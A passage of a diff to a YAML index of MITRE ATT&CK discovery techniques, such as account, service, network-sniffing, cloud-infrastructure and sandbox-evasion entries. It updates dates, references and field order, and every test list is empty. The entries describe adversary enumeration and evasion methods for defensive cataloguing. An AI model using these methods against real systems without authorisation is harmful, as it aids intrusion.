         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -48967,7 +49674,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests: []
   T1087.001:
@@ -49034,12 +49740,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -49129,18 +49834,17 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -49183,12 +49887,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests: []
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -49229,12 +49932,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49319,7 +50021,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1135:
@@ -49381,12 +50082,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests: []
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -49437,12 +50137,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49453,7 +50152,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -49468,7 +50166,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -49516,7 +50213,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests: []
   T1016.002:
@@ -49588,12 +50286,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49635,122 +50332,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -49765,6 +50413,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -49774,9 +50428,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -49786,102 +50445,137 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests: []
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -49935,7 +50629,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests: []
   T1016:
@@ -49965,7 +50658,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -50003,12 +50696,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
